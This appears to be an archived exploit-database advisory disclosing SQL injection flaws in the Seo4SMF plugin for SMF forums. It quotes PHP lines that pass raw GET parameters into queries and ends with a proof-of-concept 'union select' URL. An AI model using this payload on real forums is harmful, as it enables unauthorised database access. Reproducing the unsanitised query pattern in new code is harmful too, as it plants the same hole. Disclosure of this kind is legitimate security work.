[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Seo4SMF for SMF forums Multiple Vulnerabilities
# Published : 2009-01-11
# Author : WHK
# Previous Title : DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability
# Next Title : phpMDJ <= 1.0.3 (id_animateur) Blind SQL Injection Exploit


[1] Inyection SQL

Linea 50 al 63
$query = db_query("
SELECT m.ID_TOPIC, m.subject ,b.ID_BOARD, b.name
FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b
WHERE m.ID_TOPIC = *$topic*
AND m.ID_BOARD = b.ID_BOARD
IMIT 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 105 al 108
$query = db_query("
SELECT name FROM {$db_prefix}boards AS b
WHERE ID_BOARD = *$board*
LIMIT 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 125
$request = db_query("SELECT memberName FROM {$db_prefix}members where
ID_MEMBER=".*$user*." limit 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 143
$request = db_query("SELECT subject FROM {$db_prefix}tp_articles where
id=".*$tpage*." limit 1", __FILE__, __LINE__);

Where:

Linea 7 al 13
$topic = $_GET['t'];
$board = $_GET['b'];
$other = $_GET['o'];
$user = $_GET['u'];
$tpage = $_GET['p'];
$action = $_GET['a'];
$param = $_GET['param'];


Now execute the proof of concept:
http://localhost/smf/seo4smf-redirect.php?t=-1 union select 1,2,3a